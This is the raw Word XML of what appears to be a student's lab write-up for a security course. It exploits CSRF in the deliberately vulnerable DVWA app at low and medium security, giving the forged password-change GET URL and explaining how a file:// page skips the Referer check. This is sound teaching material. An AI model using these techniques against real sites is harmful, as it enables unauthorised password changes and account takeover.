    <w:p w14:paraId="787C9BA7" w14:textId="5FC5E681" w:rsidR="000A6CE5" w:rsidRDefault="000A6CE5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AECD99" w14:textId="3C441E4C" w:rsidR="000B3EF1" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3 Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6948218A" w14:textId="6D02EC44" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I began by inspecting the source for the </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> webpage. In the inspector tool, I saw the form had the following HTML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242ED3CE" w14:textId="5EECCDD8" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000B3EF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="507BA6FE" wp14:editId="32C2315F">
            <wp:extent cx="4115374" cy="1667108"/>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5374" cy="1667108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA1CA7C" w14:textId="6C279C2D" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="469F6801" w14:textId="408CB18B" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Since the method attribute on the form is set to GET, this means the form will send its command to the sever via a GET request (rather than the default POST method for HTML forms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083F2CB" w14:textId="110649AA" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3944B23C" w14:textId="4055397D" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>To see exactly what request would be made to the server, I made a test submission with the Firefox developer Network tab open. From this I could see the exact URL that was used for the GET request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B3BCB" w14:textId="1A45CDA3" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="000B3EF1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15AA021C" wp14:editId="2442FCF1">
            <wp:extent cx="5943600" cy="787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787400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D8B58" w14:textId="58FD9251" w:rsidR="000A6CE5" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This screenshot shows that a GET request was made to comp4108.ca:9999 for </w:t>
      </w:r>
      <w:r w:rsidR="00D442D1" w:rsidRPr="00D442D1">
        <w:t>/dvwa/vulnerabilities/csrf/?password_new=test&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00D442D1" w:rsidRPr="00D442D1">
        <w:t>_conf=test&amp;Change=Change</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This means the full URL was </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/?password_new=test&amp;test_conf=test&amp;Change=Change</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="10137AFF" w14:textId="49F59445" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73FC1CA1" w14:textId="2F40DB0C" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Next</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> I created an HTML file to exploit the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D611D" w14:textId="406B4A88" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="006D71D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F170993" wp14:editId="209DADA8">
            <wp:extent cx="5943600" cy="14198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19860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2787EEAA" w14:textId="3B34C295" w:rsidR="000B3EF1" w:rsidRDefault="000B3EF1" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This HTML file is empty, but it will make a GET request </w:t>
      </w:r>
      <w:r w:rsidR="00B15F5C">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00B15F5C" w:rsidRPr="006155C7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://comp4108.ca:9999/dvwa/vulnerabilities/csrf/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B15F5C">
        <w:t xml:space="preserve"> with the appropriate query parameters to set the password to “pas1234” in an attempt to retrieve an image for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B15F5C" w:rsidRPr="00B15F5C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B15F5C">
        <w:t xml:space="preserve"> element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721998D4" w14:textId="5B0900E3" w:rsidR="00B15F5C" w:rsidRDefault="00B15F5C" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0373F8AF" w14:textId="09AB87D8" w:rsidR="00B15F5C" w:rsidRDefault="00B15F5C" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I then opened this HTML file in the same browser I used earlier to log into the DVWA website. </w:t>
      </w:r>
      <w:r w:rsidR="001E73BC">
        <w:t xml:space="preserve">I accessed this HTML file using the URI </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="001E73BC" w:rsidRPr="008D3B8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///C:/Users/shane/Documents/0-Shane/School/COMP%204108/a4/csrf_exploit.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E73BC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Then I returned to the DWVA website, logged out, and then was able to login again with the new “pas1234” password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9F1ADE" w14:textId="2EAE65F4" w:rsidR="00B15F5C" w:rsidRDefault="00B15F5C" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738A0DC4" w14:textId="4EC6A178" w:rsidR="003A21ED" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Here is the low security PHP code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D6624" w14:textId="2B5BB07F" w:rsidR="003A21ED" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="003A21ED">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778EBC65" wp14:editId="4643DB4F">
            <wp:extent cx="5943600" cy="33858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85820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD3D89" w14:textId="77777777" w:rsidR="003A21ED" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0244A8" w14:textId="287D53AA" w:rsidR="00B15F5C" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>There’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> really nothing to say except that lines 14 and 15 update the password for the comp4108 user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFF7580" w14:textId="654B9A0C" w:rsidR="003A21ED" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1318EF" w14:textId="77777777" w:rsidR="00446332" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Now I will explain how this exploit/vulnerability worked in terms of cookies. The web browser I used stored the cookies for the comp4108.ca:9999 domain when I first logged into the DVWA website. Naturally, the browser will return the cookies specific to this domain when I access pages on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2805799B" w14:textId="77777777" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2061A397" w14:textId="5884E7C6" w:rsidR="003A21ED" w:rsidRDefault="003A21ED" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, these cookies will also be returned if a different website, like my exploit website, </w:t>
      </w:r>
      <w:r w:rsidR="00446332">
        <w:t>makes a request to the comp4108.ca:9999 domain. Then, without any CSRF token to protect against the exploit, the browser will give the cookies (specifically, in this case, the PHPSESSID cookie) as part of the malicious request to change the password, which allows the password change to be authenticated on the server side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC8226" w14:textId="43D9E93C" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19D57F56" w14:textId="0053CFAE" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I can show this more concretely. Here we can see the request cookies used by the request from the DVWA page (this is again using the Network tab of the Firefox developer tools, with the password GET request selected):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8AF246" w14:textId="2A52FA96" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00446332">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B61E4E8" wp14:editId="15974E4F">
            <wp:extent cx="2534004" cy="10669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34004" cy="1066949"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49646C70" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B3DC28" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FAD2D70" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334E07D1" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C64250F" w14:textId="21B4E1FA" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And here </w:t>
      </w:r>
      <w:r w:rsidR="00F262E2">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the same cookies being used when I load my exploit HTML page in the same browser:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DEE4C1" w14:textId="19F05309" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00446332">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C6AD616" wp14:editId="79A3BF57">
            <wp:extent cx="3543795" cy="1152686"/>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43795" cy="1152686"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AE3F6F" w14:textId="31C1A432" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CC4E63B" w14:textId="4C95F336" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One thing to note though, is that this attack does not work if the user views the DVWA page in one browser and the exploit HTML page in a separate browser, since each browser manages their cookies separately. The exploit only works if both pages are viewed on the same browser, and the user did not clear their cookies (and, of course, only if the CSRF vulnerability </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hasn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> been patched).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA02A85" w14:textId="2E8C0A3B" w:rsidR="00446332" w:rsidRDefault="00446332" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D715213" w14:textId="5900412F" w:rsidR="00446332" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 3 </w:t>
      </w:r>
      <w:r w:rsidR="00446332">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9695C" w14:textId="3902B0F5" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I edited my HTML file to use the password “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>difpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”. I wanted to use a new password so I would know for sure my change worked. I then changed my security level from “low” to “medium”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374B795A" w14:textId="657B3D12" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E2D167" w14:textId="3350A96F" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>Next, I reloaded my HTML file in my browser. I checked the request in the Network tab of the developer tools, and I saw I 200 HTTP code, and confirmed the security cookie was indeed set to “medium”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880E37D" w14:textId="705D05BC" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="006D71D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55624A41" wp14:editId="10DFAF84">
            <wp:extent cx="5943600" cy="12496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249680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1F2A3" w14:textId="2F21681A" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA36DCF" w14:textId="3E2CE29B" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>I then returned to the DVWA, logged out, and logged in with the password “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>difpassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”, and the login was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFE37BD" w14:textId="65AD28EC" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76045915" w14:textId="77777777" w:rsidR="00F262E2" w:rsidRDefault="00F262E2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F07C8B7" w14:textId="79D185BB" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Here is the medium PHP code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A5EFC" w14:textId="0518B74F" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="006D71D5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="291705DE" wp14:editId="48EE9D63">
            <wp:extent cx="5943600" cy="37630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763010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D0B19" w14:textId="260002F2" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461AFDB6" w14:textId="1F743E8B" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>The difference between this code and the low security code is that it checks the HTTP_REFERER header (line 6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275B7C0F" w14:textId="77777777" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="697DD428" w14:textId="5EB06EE1" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="008D3B8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.php.net/manual/en/function.eregi.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E73BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>eregi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E73BC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> performs a case insensitive regex matching. It returns true if the regex pattern (the first argument) was found in the second argument, else returns false. So line 6 checks that the HTTP Referer header contains the string “127.0.0.1”. Therefore, the password can only be changed if the HTTP request is from localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E2775" w14:textId="095CBAAE" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22B795A9" w14:textId="785AC2A9" w:rsidR="001E73BC" w:rsidRDefault="001E73BC" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="008D3B8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, one of the conditions by which a Referer header is not sent by browsers is if the referring resource is a local “file” or “data” URI. In my case, my URI is </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="008D3B8B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///C:/Users/shane/Documents/0-Shane/School/COMP%204108/a4/csrf_exploit.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, and therefore it is a “file” URI, and the Referer header is not sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DECFDE2" w14:textId="77D4965F" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3199C175" w14:textId="7B485F64" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>didn’t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> need to adapt my low security solution at all to bypass this additional protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F75A5F" w14:textId="2C52A30A" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794576C5" w14:textId="228066A8" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EF0117" w14:textId="4B4D2608" w:rsidR="006D71D5" w:rsidRDefault="00F262E2" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Question 4 </w:t>
      </w:r>
      <w:r w:rsidR="006D71D5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14142AF8" w14:textId="75EB2F04" w:rsidR="006D71D5" w:rsidRDefault="006D71D5" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>The PHP code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77B499" w14:textId="7C92F860" w:rsidR="006D71D5" w:rsidRDefault="00AB5AD9" w:rsidP="00035293">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AD9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15986E74" wp14:editId="13D20EEB">
            <wp:extent cx="4829849" cy="857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29849" cy="857370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="048555E8" w14:textId="2CAE9C7E" w:rsidR="00F262E2" w:rsidRDefault="00AB5AD9" w:rsidP="001E73BC">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
